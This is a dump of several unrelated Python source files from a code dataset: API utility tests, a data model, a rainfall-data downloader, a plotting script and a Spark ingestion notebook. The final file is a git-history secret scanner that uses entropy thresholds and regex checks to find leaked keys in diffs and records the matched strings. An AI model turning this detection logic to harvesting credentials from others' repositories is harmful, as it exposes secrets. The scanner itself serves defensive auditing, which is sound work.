test_diff(self):\n dict1 = dict(a=1, b=[1, 2, 3])\n dict2 = dict(a=1, b=[1, 3])\n dict3 = dict(\n a=dict(a=1, b=[1, 2, 3], c=4),\n b=dict(a=2, b=[1, 2, 3], c=4),\n )\n dict4 = dict(\n a=dict(a=2, b=[1, 3], c=5),\n b=dict(a=2, b=[1, 2], c=4),\n )\n\n list1 = [dict1, dict3]\n list2 = [dict2, dict4]\n\n self.assertEqual(utils._diff_(dict1, dict2), [\n ('b', 3, 2),\n ])\n\n self.assertEqual(utils._diff_(dict2, dict1), [\n ('b', 2, 3),\n ])\n\n self.assertEqual(sorted(utils._diff_(dict3, dict4)), sorted([\n ('a/a', 1, 2), ('a/b', 3, 2), 
('a/c', 4, 5), ('b/b', 3, 2)\n ]))\n\n self.assertEqual(sorted(utils._diff_(list1, list2)), sorted([\n ('0/b', 3, 2),\n ('1/a/a', 1, 2),\n ('1/a/b', 3, 2),\n ('1/a/c', 4, 5),\n ('1/b/b', 3, 2)\n ]))\n\n # test include\n self.assertEqual(sorted(utils._diff_(dict3, dict4, include=['a'])), sorted([\n ('a/a', 1, 2)\n ]))\n # test exclude\n self.assertEqual(sorted(utils._diff_(dict3, dict4, exclude=['a'])), sorted([\n ('b/b', 3, 2)\n ]))\n # test include and exclude\n self.assertEqual(sorted(utils._diff_(dict3, dict4, include=['a', 'b'], exclude=['a'])), sorted([\n ('b/b', 3, 2)\n ]))\n\n def test_get_or_none(self):\n \"\"\" test for get_or_none\n \"\"\"\n class A(object): pass\n a = A()\n setattr(A, 'b', A())\n setattr(a.b, 'c', A())\n setattr(a.b.c, 'd', 'test string')\n self.assertEqual(utils.get_or_none(a, 'b', 'c', 'd'), 'test string')\n self.assertEqual(utils.get_or_none(a, 'b', 'c', 'd', 'e'), None)\n\n def test_url_dirname(self):\n \"\"\" test url_dirname\n \"\"\"\n self.assertEqual(utils.url_dirname('https://localhost/test/swagger.json'), 'https://localhost/test')\n self.assertEqual(utils.url_dirname('https://localhost/test/'), 'https://localhost/test/')\n self.assertEqual(utils.url_dirname('https://localhost/test'), 'https://localhost/test')\n\n def test_url_join(self):\n \"\"\" test url_join\n \"\"\"\n self.assertEqual(utils.url_join('https://localhost/test', 'swagger.json'), 'https://localhost/test/swagger.json')\n self.assertEqual(utils.url_join('https://localhost/test/', 'swagger.json'), 'https://localhost/test/swagger.json')\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_patch_path(self):\n \"\"\" make sure patch_path works\n \"\"\"\n self.assertEqual(utils.patch_path(\n '/Users/sudeep.agarwal/src/squiddy/api/v0.1',\n '/Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml',\n ), '/Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix-like os')\n def test_patch_path_on_windows(self):\n self.assertEqual(utils.patch_path(\n 'Users/sudeep.agarwal/src/squiddy/api/v0.1',\n 'Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml',\n ), 'Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml')\n\n\nclass WalkTestCase(unittest.TestCase):\n \"\"\" test for walk \"\"\"\n\n @staticmethod\n def _out(conf, idx):\n return conf[idx]\n\n def test_self_cycle(self):\n conf = {\n 0: [0]\n }\n\n cyc = utils.walk(\n 0, functools.partial(WalkTestCase._out, conf)\n )\n self.assertEqual(cyc, [[0, 0]])\n\n def test_1_long_cycle(self):\n conf = {\n 0: [1],\n 1: [2],\n 2: [3],\n 3: [4],\n 4: [5],\n 5: [1]\n }\n\n cyc = []\n for i in range(6):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [[1, 2, 3, 4, 5, 1]])\n\n def test_multiple_cycles(self):\n conf = {\n 0: [6],\n 1: [6],\n 2: [0],\n 3: [1],\n 4: [4],\n 5: [3],\n 6: [3],\n 7: [4],\n 8: [0]\n }\n\n cyc = []\n for i in range(9):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [\n [1, 6, 3, 1],\n [4, 4]\n ])\n\n def test_cycles_share_border(self):\n conf = {\n 0: [1],\n 1: [2],\n 2: [3],\n 3: [0, 5],\n 4: [2],\n 5: [4]\n }\n\n cyc = []\n for i in range(6):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [\n [0, 1, 2, 3, 0],\n [2, 3, 5, 4, 2]\n ])\n\n def test_no_cycle(self):\n conf = {\n 0: [1, 2],\n 1: [2, 3],\n 2: [3, 4],\n 3: [4, 5],\n 4: [5, 6],\n 5: [6, 7],\n 6: [7],\n 7: []\n 
}\n\n        cyc = []\n        for i in range(8):\n            cyc = utils.walk(\n                i,\n                functools.partial(WalkTestCase._out, conf),\n                cyc\n            )\n\n        self.assertEqual(cyc, [])\n\n    def test_multiple_cycles_2(self):\n        conf = {\n            0: [1, 4],\n            1: [2],\n            2: [0, 3],\n            3: [4, 5],\n            4: [1, 2],\n            5: [4]\n        }\n\n        cyc = []\n        for i in range(6):\n            cyc = utils.walk(\n                i,\n                functools.partial(WalkTestCase._out, conf),\n                cyc\n            )\n\n        self.assertEqual(sorted(cyc), sorted([\n            [0, 1, 2, 0],\n            [0, 4, 1, 2, 0],\n            [0, 4, 2, 0],\n            [1, 2, 3, 4, 1],\n            [1, 2, 3, 5, 4, 1],\n            [2, 3, 5, 4, 2],\n            [2, 3, 4, 2]\n        ]))\n\n    def test_case_insensitive_dict(self):\n        \"\"\" test utils.CaseInsensitiveDict\n        \"\"\"\n        normal = utils.CaseInsensitiveDict()\n        normal['Content-Type'] = 'application/json'\n        self.assertTrue('Content-Type' in normal)\n        self.assertTrue('content-type' in normal)\n        self.assertEqual(normal['content-type'], 'application/json')\n\n        # test iteration\n        for k, v in normal.iteritems():\n            self.assertEqual(k, 'Content-Type')\n            self.assertEqual(v, 'application/json')\n            break\n        else:\n            # should not reach here\n            self.assertTrue(False)\n\n        for v in normal.itervalues():\n            self.assertEqual(v, 'application/json')\n            break\n        else:\n            # should not reach here\n            self.assertTrue(False)\n","repo_name":"pyopenapi/pyswagger","sub_path":"pyswagger/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":16610,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"48"}
+{"seq_id":"22909359202","text":"from app.models.baseModel import BaseModel\nfrom app.models.scripts.errors import ScriptNotFoundException\nfrom app.models.users.user import User\n\n\nclass Script(BaseModel):\n    def __init__(self, name, body, _id=None):\n        self.name = name\n        self.body = body\n        super().__init__(_id)\n\n    @classmethod\n    def add(cls, user: User, new_script):\n        \"\"\"\n        Adds a new script to the given user.\n        :param user: User object\n        :param new_script: The new script to be added to the user\n        :return: The newly added script data\n        \"\"\"\n        script = cls(**new_script)\n        user.scripts.append(script)\n        user.update_mongo()\n        return new_script\n\n    @staticmethod\n    def get_user_scripts(user: User):\n        \"\"\"\n        Retrieves the information of all the scripts associated with one user.\n        :param user: User object\n        :return: All the scripts of the current user\n        \"\"\"\n        return user.scripts\n\n    @staticmethod\n    def get(user: User, script_id):\n        \"\"\"\n        Retrieves the information of the script with the given id.\n        :param user: User object\n        :param script_id: The id of the script to be read from the user\n        :return: The requested script\n        \"\"\"\n        for script in user.scripts:\n            if script.json()[\"_id\"] == script_id:\n                return script\n        raise ScriptNotFoundException(\"The script with the given ID does not exist\")\n\n    @staticmethod\n    def update(user: User, _id, data):\n        \"\"\"\n        Updates the information (name and/or body message) of the script with the given id.\n        :param user: User object\n        :param _id: The ID of the script to be updated\n        :param data: Dictionary containing the name and body message to be updated\n        :return: All the scripts of the current user, with updated data\n        \"\"\"\n        for script in user.scripts:\n            if script.json()[\"_id\"] == _id:\n                user.scripts[user.scripts.index(script)].name = data[\"name\"]\n                user.scripts[user.scripts.index(script)].body = data[\"body\"]\n                user.update_mongo()\n                return user.scripts\n        raise ScriptNotFoundException(\"The script with the given ID does not exist\")\n\n    @staticmethod\n    def delete(user: User, _id):\n        \"\"\"\n        Removes from the user's array of scripts the script with the given id.\n        :param user: User object\n        :param _id: The ID of the script to be deleted\n        :return: The remaining scripts of the user\n        \"\"\"\n        for script in user.scripts:\n            if script.json()[\"_id\"] == _id:\n                user.scripts.remove(script)\n                user.update_mongo()\n                return user.scripts\n        raise ScriptNotFoundException(\"The script with the given ID does not exist\")\n\n","repo_name":"iThinkEmo/Iualia-doc-sphinx","sub_path":"app/models/scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"31272652735","text":"# -*- coding: utf-8 -*-\n\"\"\"\n**CHIRPS**\n\n`Restrictions`\n\nThe data and this python file may not be distributed to others without\npermission of the WA+ team.\n\n`Description`\n\nThis module downloads daily and monthly CHIRPS 2.0 data from the\n``ftp://chg-ftpout.geog.ucsb.edu`` server.\n\nUse the CHIRPS.daily or CHIRPS.monthly functions to download\nand create daily or monthly CHIRPS images in GTiff format.\n\nThe **CHIRPS** data is available from ``1981-01-01`` until now.\n\n**Examples:**\n::\n\n    from wateraccounting.Collect import CHIRPS\n    CHIRPS.daily(Dir='C:/Temp/',\n                 Startdate='2003-12-01', Enddate='2004-01-20',\n                 latlim=[-10, 30], lonlim=[-20, -10])\n\n    CHIRPS.monthly(Dir='C:/Temp/',\n                   Startdate='2003-12-01', Enddate='2004-01-20',\n                   latlim=[-10, 30], lonlim=[-20, -10])\n\"\"\"\n# General modules\nimport os\n# import sys\n# import glob\n# import shutil\n\n# # import math\n# # import datetime\n\nfrom ftplib import FTP\nfrom joblib import Parallel, delayed\n\nimport numpy as np\nimport pandas as pd\nfrom netCDF4 import Dataset\n\n# Water Accounting Modules\ntry:\n    from .download import Download\nexcept ImportError:\n    from src.wateraccounting.Collect.download import Download\n\n# NOTE (assumption): RetrieveData below calls DC.Extract_Data_gz,\n# DC.Save_as_tiff and RC.Open_tiff_array, but no matching imports survived\n# in this file. The watools package (already used for WaitbarConsole) ships\n# helpers with these names, so the following imports are assumed:\nimport watools.General.data_conversions as DC\nimport watools.General.raster_conversions as RC\n\n\ndef DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, TimeCase):\n    \"\"\"\n    This function downloads CHIRPS daily or monthly data\n\n    Keyword arguments:\n    Dir -- 'C:/file/to/path/'\n    Startdate -- 'yyyy-mm-dd'\n    Enddate -- 'yyyy-mm-dd'\n    latlim -- [ymin, ymax] (values must be between -50 and 50)\n    lonlim -- [xmin, xmax] (values must be between -180 and 180)\n    Waitbar -- 1 (Default) will print a waitbar\n    cores -- The number of cores used to run the routine. 
It can be 'False'\n                 to avoid using parallel computing routines.\n    TimeCase -- String equal to 'daily' or 'monthly'\n    \"\"\"\n    # Define timestep for the timedates\n    if TimeCase == 'daily':\n        TimeFreq = 'D'\n        output_folder = os.path.join(Dir, 'Precipitation', 'CHIRPS', 'Daily')\n    elif TimeCase == 'monthly':\n        TimeFreq = 'MS'\n        output_folder = os.path.join(Dir, 'Precipitation', 'CHIRPS', 'Monthly')\n    else:\n        raise KeyError(\"The input time interval is not supported\")\n\n    # make the directory if it does not exist\n    if not os.path.exists(output_folder):\n        os.makedirs(output_folder)\n\n    # check time variables\n    if not Startdate:\n        Startdate = pd.Timestamp('1981-01-01')\n    if not Enddate:\n        Enddate = pd.Timestamp('Now')\n\n    # Create days\n    Dates = pd.date_range(Startdate, Enddate, freq=TimeFreq)\n\n    # Create Waitbar\n    if Waitbar == 1:\n        import watools.Functions.Start.WaitbarConsole as WaitbarConsole\n        total_amount = len(Dates)\n        amount = 0\n        WaitbarConsole.printWaitBar(amount, total_amount, prefix='Progress:',\n                                    suffix='Complete', length=50)\n\n    # Check space variables. np.maximum/np.minimum clip element-wise, whereas\n    # np.max(a, -50) would read -50 as an axis argument; the original also\n    # clipped against the wrong variable (lonlim vs latlim) in two places.\n    if latlim[0] < -50 or latlim[1] > 50:\n        print('Latitude above 50N or below 50S is not possible.'\n              ' Value set to maximum')\n        latlim[0] = np.maximum(latlim[0], -50)\n        latlim[1] = np.minimum(latlim[1], 50)\n    if lonlim[0] < -180 or lonlim[1] > 180:\n        print('Longitude must be between 180E and 180W.'\n              ' Now value is set to maximum')\n        lonlim[0] = np.maximum(lonlim[0], -180)\n        lonlim[1] = np.minimum(lonlim[1], 180)\n\n    # Define IDs\n    yID = 2000 - np.int16(np.array([np.ceil((latlim[1] + 50) * 20),\n                                    np.floor((latlim[0] + 50) * 20)]))\n    xID = np.int16(np.array([np.floor((lonlim[0] + 180) * 20),\n                             np.ceil((lonlim[1] + 180) * 20)]))\n\n    # Pass variables to parallel function and run\n    args = [output_folder, TimeCase, xID, yID, lonlim, latlim]\n    if not cores:\n        for Date in Dates:\n            RetrieveData(Date, args)\n            if Waitbar == 1:\n                amount += 1\n                WaitbarConsole.printWaitBar(amount, total_amount, prefix='Progress:',\n                                            suffix='Complete', length=50)\n        results = True\n    else:\n        results = Parallel(n_jobs=cores)(delayed(RetrieveData)(Date, args)\n                                         for Date in Dates)\n    return results\n\n\ndef RetrieveData(Date, args):\n    \"\"\"\n    This function retrieves CHIRPS data for a given date from the\n    ftp://chg-ftpout.geog.ucsb.edu server.\n\n    Keyword arguments:\n    Date -- 'yyyy-mm-dd'\n    args -- A list of parameters defined in the DownloadData function.\n    \"\"\"\n    # Argument\n    [output_folder, TimeCase, xID, yID, lonlim, latlim] = args\n\n    # open ftp server\n    ftp = FTP(\"chg-ftpout.geog.ucsb.edu\", \"\", \"\")\n    ftp.login()\n\n    # Define FTP path to directory\n    if TimeCase == 'daily':\n        pathFTP = 'pub/org/chg/products/CHIRPS-2.0/global_daily/tifs/p05/%s/' % Date.strftime(\n            '%Y')\n    elif TimeCase == 'monthly':\n        pathFTP = 'pub/org/chg/products/CHIRPS-2.0/global_monthly/tifs/'\n    else:\n        raise KeyError(\"The input time interval is not supported\")\n\n    # find the document name in this directory\n    ftp.cwd(pathFTP)\n    listing = []\n\n    # read all the file names in the directory\n    ftp.retrlines(\"LIST\", listing.append)\n\n    # create all the input name (filename) and output (outfilename, filetif, DirFileEnd) names\n    if TimeCase == 'daily':\n        filename = 'chirps-v2.0.%s.%02s.%02s.tif.gz' % (\n            Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d'))\n        outfilename = os.path.join(output_folder, 'chirps-v2.0.%s.%02s.%02s.tif' % (\n            Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d')))\n        DirFileEnd = os.path.join(output_folder,\n                                  'P_CHIRPS.v2.0_mm-day-1_daily_%s.%02s.%02s.tif' % (\n                                      
Date.strftime('%Y'), Date.strftime('%m'),\n                                      Date.strftime('%d')))\n    elif TimeCase == 'monthly':\n        filename = 'chirps-v2.0.%s.%02s.tif.gz' % (\n            Date.strftime('%Y'), Date.strftime('%m'))\n        outfilename = os.path.join(output_folder, 'chirps-v2.0.%s.%02s.tif' % (\n            Date.strftime('%Y'), Date.strftime('%m')))\n        DirFileEnd = os.path.join(output_folder,\n                                  'P_CHIRPS.v2.0_mm-month-1_monthly_%s.%02s.%02s.tif' % (\n                                      Date.strftime('%Y'), Date.strftime('%m'),\n                                      Date.strftime('%d')))\n    else:\n        raise KeyError(\"The input time interval is not supported\")\n\n    # download the global rainfall file\n    try:\n        local_filename = os.path.join(output_folder, filename)\n        lf = open(local_filename, \"wb\")\n        ftp.retrbinary(\"RETR \" + filename, lf.write, 8192)\n        lf.close()\n\n        # unzip the file\n        zip_filename = os.path.join(output_folder, filename)\n        DC.Extract_Data_gz(zip_filename, outfilename)\n\n        # open tiff file\n        dataset = RC.Open_tiff_array(outfilename)\n\n        # clip dataset to the given extent\n        data = dataset[yID[0]:yID[1], xID[0]:xID[1]]\n        data[data < 0] = -9999\n\n        # save dataset as geotiff file\n        geo = [lonlim[0], 0.05, 0, latlim[1], 0, -0.05]\n        DC.Save_as_tiff(name=DirFileEnd, data=data, geo=geo, projection=\"WGS84\")\n\n        # delete old tif file\n        os.remove(outfilename)\n\n    except Exception as err:\n        print(\"downloading %s failed: %s\" % (filename, err))\n    return True\n","repo_name":"IHEProjects/WaterAccounting","sub_path":"src/wateraccounting/Collect/products/CHIRPS.py","file_name":"CHIRPS.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42043431418","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('drugs.csv')\n\ngrp = data.groupby(['Year'])\nyr_mean = grp.mean()\nyr_mean = yr_mean.reset_index()\n\nrate12 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_12-17\"]\nrate18 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_18-25\"]\nrate26 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_26+\"]\n\nyr = yr_mean[\"Year\"]\nplt.bar(yr, rate18 + rate12 + rate26)\nplt.bar(yr, rate18 + rate12)\nplt.bar(yr.values, rate12)\n\n\n\n\n\n\nplt.show()\n","repo_name":"dvanderelst/GradStats","sub_path":"DataScenarios/scenario_Drugs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4889759502","text":"# Databricks notebook source\n# MAGIC %run ../includes/configuration\n\n# COMMAND ----------\n\n# MAGIC %run ../includes/common_functions\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Ingest file & apply schema\n\n# COMMAND ----------\n\n#write schema\nfrom pyspark.sql.types import StructField, StructType, IntegerType, StringType, TimestampType\n\nraces_schema = StructType([StructField('raceId',IntegerType(), nullable=False), \\\n                            StructField('year',IntegerType(), nullable=True), \\\n                            StructField('round',IntegerType(), nullable=True), \\\n                            StructField('circuitId',IntegerType(), nullable=False), \\\n                            StructField('name',StringType(), nullable=True), \\\n                            StructField('date',StringType(), nullable=True), \\\n                            StructField('time',StringType(), nullable=True)])\n\n# COMMAND ----------\n\n#load file\nraces_df = spark.read \\\n    .schema(races_schema) \\\n    .option('header', True) \\\n    .csv(f\"{raw_folder_path}/races.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Drop unwanted column\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\n\nselected_races_df 
= races_df.select(col('raceId'),col('year'),col('round'),col('circuitId'),col('name'),col('date'),col('time'))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Rename columns\n\n# COMMAND ----------\n\nrenamed_races_df = selected_races_df.withColumnRenamed('raceId','race_id') \\\n .withColumnRenamed('year','race_year') \\\n .withColumnRenamed('circuitID','circuit_id')\n\n# COMMAND ----------\n\ntype(renamed_races_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Add column\n\n# COMMAND ----------\n\ningestion_races_df = add_ingestion_date(renamed_races_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 5 - Transform column\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import to_timestamp, concat, lit\n\ntransform_races_df = ingestion_races_df.withColumn('race_timestamp', to_timestamp(concat(col('date'),lit(' '), col('time')), 'yyyy-MM-dd HH:mm:ss'))\n\n# COMMAND ----------\n\nfinal_races_df = transform_races_df.select(col('race_Id'),col('race_year'),col('round'),col('circuit_Id'),col('name'),col('race_timestamp'),col('ingestion_date'))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### Step 6 - Write to file (PARTITIONED!)\n# MAGIC Partitioned data EXTREMELY USEFUL for Spark, because it allows for parallel processing making full use of cluster architecture. \n\n# COMMAND ----------\n\nfinal_races_df.write.mode('overwrite').partitionBy('race_year').parquet(f\"{processed_folder_path}/races\")\n","repo_name":"M1sterDonut/Azure-Databricks-Spark-Core-For-Data-Engineers-Python-SQL-","sub_path":"formula1/ingestion/2.ingest_races_file.py","file_name":"2.ingest_races_file.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16826782311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport math\nimport datetime\nimport argparse\nimport os\nimport json\nimport stat\nimport time\nimport re\nfrom regexChecks import regexes_txt, regexes_fs\nfrom git import Repo\n\nBASE64_CHARS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\nHEX_CHARS = \"1234567890abcdefABCDEF\"\n\n# Get current date\nCURR_TIME = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\n\n\ndef str2bool(v):\n if not v:\n return True\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef del_rw(action, name, exc):\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n\ndef shannon_entropy(data, iterator):\n \"\"\"\n Borrowed from http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html\n \"\"\"\n if not data:\n return 0\n entropy = 0\n for x in iterator:\n p_x = float(data.count(x))/len(data)\n if p_x > 0:\n entropy += - p_x*math.log(p_x, 2)\n return entropy\n\n\ndef get_strings_of_set(word, char_set, threshold=20):\n count = 0\n letters = \"\"\n strings = []\n for char in word:\n if char in char_set:\n letters += char\n count += 1\n else:\n if count > threshold:\n strings.append(letters)\n letters = \"\"\n count = 0\n if count > threshold:\n strings.append(letters)\n return strings\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef print_results(printJson, issue):\n commit_time = issue['date']\n branch_name = 
issue['branch']\n    prev_commit = issue['commit']\n    printableDiff = issue['printDiff']\n    commitHash = issue['commitHash']\n    reason = issue['reason']\n    path = issue['path']\n\n    if printJson:\n        print(json.dumps(issue, sort_keys=True, indent=4))\n    else:\n        print(\"~~~~~~~~~~~~~~~~~~~~~\")\n        reason = \"{}Reason: {}{}\".format(bcolors.OKGREEN, reason, bcolors.ENDC)\n        print(reason)\n        dateStr = \"{}Date: {}{}\".format(bcolors.OKGREEN, commit_time, bcolors.ENDC)\n        print(dateStr)\n        hashStr = \"{}Hash: {}{}\".format(bcolors.OKGREEN, commitHash, bcolors.ENDC)\n        print(hashStr)\n        filePath = \"{}Filepath: {}{}\".format(bcolors.OKGREEN, path, bcolors.ENDC)\n        print(filePath)\n\n        if sys.version_info >= (3, 0):\n            branchStr = \"{}Branch: {}{}\".format(bcolors.OKGREEN, branch_name, bcolors.ENDC)\n            print(branchStr)\n            commitStr = \"{}Commit: {}{}\".format(bcolors.OKGREEN, prev_commit, bcolors.ENDC)\n            print(commitStr)\n            print(printableDiff)\n        else:\n            branchStr = \"{}Branch: {}{}\".format(bcolors.OKGREEN, branch_name.encode('utf-8'), bcolors.ENDC)\n            print(branchStr)\n            commitStr = \"{}Commit: {}{}\".format(bcolors.OKGREEN, prev_commit.encode('utf-8'), bcolors.ENDC)\n            print(commitStr)\n            print(printableDiff.encode('utf-8'))\n        print(\"~~~~~~~~~~~~~~~~~~~~~\")\n\n\ndef find_entropy(printableDiff, commit_time, branch_name, prev_commit, blob, commitHash, git_url, json_repos):\n    stringsFound = []\n    lines = printableDiff.split(\"\\n\")\n    for line in lines:\n        for word in line.split():\n            base64_strings = get_strings_of_set(word, BASE64_CHARS)\n            hex_strings = get_strings_of_set(word, HEX_CHARS)\n            for string in base64_strings:\n                b64Entropy = shannon_entropy(string, BASE64_CHARS)\n                if b64Entropy > 4.5:\n                    stringsFound.append(string)\n                    printableDiff = printableDiff.replace(string, bcolors.WARNING + string + bcolors.ENDC)\n            for string in hex_strings:\n                hexEntropy = shannon_entropy(string, HEX_CHARS)\n                if hexEntropy > 3:\n                    stringsFound.append(string)\n                    printableDiff = printableDiff.replace(string, bcolors.WARNING + string + bcolors.ENDC)\n    entropicDiff = None\n    if len(stringsFound) > 0:\n        entropicDiff = {}\n        entropicDiff['gitUrl'] = git_url\n        entropicDiff['gitSlug'] = json_repos[git_url]['slug']\n        entropicDiff['project'] = json_repos[git_url]['project']\n        entropicDiff['projectName'] = json_repos[git_url]['project_name']\n        entropicDiff['language'] = json_repos[git_url]['language']\n        entropicDiff['date'] = commit_time\n        entropicDiff['creation_date'] = CURR_TIME\n        entropicDiff['path'] = blob.b_path if blob.b_path else blob.a_path\n        entropicDiff['author'] = prev_commit.committer.name if prev_commit.committer.name else prev_commit.author.email\n        entropicDiff['branch'] = branch_name\n        entropicDiff['type'] = 'Entropy'\n        entropicDiff['commit'] = prev_commit.message\n        entropicDiff['diff'] = blob.diff.decode('utf-8', errors='replace')\n        entropicDiff['stringsFound'] = stringsFound\n        entropicDiff['printDiff'] = printableDiff\n        entropicDiff['commitHash'] = commitHash\n        entropicDiff['reason'] = \"High Entropy\"\n    return entropicDiff\n\n\ndef idx_bound_verification(bound, idx, printableDiff):\n    \"\"\"\n    Expand the regex match boundaries by *bound* characters on each side,\n    clamped so that they stay inside printableDiff.\n    :param bound: number of characters of context to add on each side\n    :param idx: (start, end) indices of the regex match\n    :param printableDiff: diff text that will be sliced\n    :return: clamped (lower_idx, upper_idx)\n    \"\"\"\n    # Clamping with max/min keeps the expanded window inside the string; a\n    # negative lower index would otherwise wrap around and slice the wrong span\n    lower_idx = max(idx[0] - bound, 0)\n    upper_idx = min(idx[1] + bound, len(printableDiff))\n    return lower_idx, upper_idx\n\n\ndef regex_txt_check(printableDiff, commit_time, branch_name, prev_commit, blob, commitHash, git_url, json_repos):\n    regex_matches = []\n    # Set bound for expanded code match in git diff\n    bound = 30\n    for key in regexes_txt.keys():\n        found_strings_search = regexes_txt[key].search(printableDiff)\n\n        # for found_string in found_strings:\n        #     found_diff += bcolors.WARNING + str(found_string) + bcolors.ENDC + '\\n'\n        # for found_string_exp in found_strings_expand:\n        #     found_diff_exp += bcolors.OKGREEN + str(found_string_exp) + bcolors.ENDC + '\\n'\n        # if regexes_txt[key].group:\n        if found_strings_search:\n            # found_strings, found_strings_exp, found_strings_clr = '', '', ''\n            idx = found_strings_search.regs[0]\n            found_string = re.sub(r'(\\r|\\n)', '', str(printableDiff[idx[0]:idx[1]]))\n            # found_strings += found_string\n            # found_strings_clr += bcolors.WARNING + found_string + bcolors.ENDC\n            lower_idx, upper_idx = idx_bound_verification(bound, idx, printableDiff)\n            found_string_exp = re.sub(r'(\\r|\\n)', '', str(printableDiff[lower_idx:upper_idx]))\n            # found_strings_exp += found_string_exp\n\n            found_regex = {}\n            found_regex['gitUrl'] = git_url\n            found_regex['gitSlug'] = json_repos[git_url]['slug']\n            found_regex['project'] = json_repos[git_url]['project']\n            found_regex['projectName'] = json_repos[git_url]['project_name']\n            found_regex['language'] = json_repos[git_url]['language']\n            found_regex['commit_date'] = commit_time\n            found_regex['audit_date'] = CURR_TIME\n            try:\n                found_regex['path'] = blob.a_blob.abspath if blob.a_blob.abspath else blob.a_path\n            except AttributeError:\n                found_regex['path'] = blob.b_blob.abspath if blob.b_blob.abspath else blob.abspath\n            found_regex['branch'] = branch_name\n            found_regex['commit'] = re.sub(r'(\\r|\\n)', '', prev_commit.message)\n            found_regex['author'] = prev_commit.committer.name if prev_commit.committer.name else prev_commit.author.email\n            diff = re.compile('(^.+?)\\n').findall(printableDiff)\n            found_regex['diff'] = \"Diff details: \" + str(diff) + '\\nMatched string in diff context:\\n' + \\\n                                  \"-----begin omitted-----\\n\" + found_string_exp + \"\\n-----end omitted-----\"\n            found_regex['type'] = 'MatchStringInDiff'\n            found_regex['stringsFound'] = found_string\n            # found_regex['printDiff'] = ''\n            found_regex['reason'] = key\n            found_regex['commitHash'] = commitHash\n            regex_matches.append(found_regex)\n    return regex_matches\n\n\ndef regex_fs_check_tree(commit_time, branch_name, prev_commit, commitHash, git_url, json_repos):\n    regex_matches = []\n    for file_git in prev_commit.tree.blobs:\n        for key in regexes_fs:\n            repo_path = file_git.abspath.split(\"/repos/\")[-1]\n            found_strings = regexes_fs[key].search(repo_path)\n            if found_strings:\n                # found_strings, found_strings_exp, found_strings_clr = '', '', ''\n                for idx in found_strings.regs:\n                    found_string = re.sub(r'(\\r|\\n)', '', str(repo_path[idx[0]:idx[1]]))\n\n                    found_regex = {}\n                    found_regex['gitUrl'] = git_url\n                    found_regex['gitSlug'] = json_repos[git_url]['slug']\n                    found_regex['project'] = json_repos[git_url]['project']\n                    found_regex['projectName'] = json_repos[git_url]['project_name']\n                    found_regex['language'] = json_repos[git_url]['language']\n                    found_regex['commit_date'] = commit_time\n                    found_regex['audit_date'] = CURR_TIME\n                    found_regex['path'] = repo_path\n                    found_regex['branch'] = branch_name\n                    found_regex['author'] = prev_commit.committer.name if prev_commit.committer.name else prev_commit.author.email\n                    found_regex['commit'] = re.sub(r'(\\r|\\n)', '', 
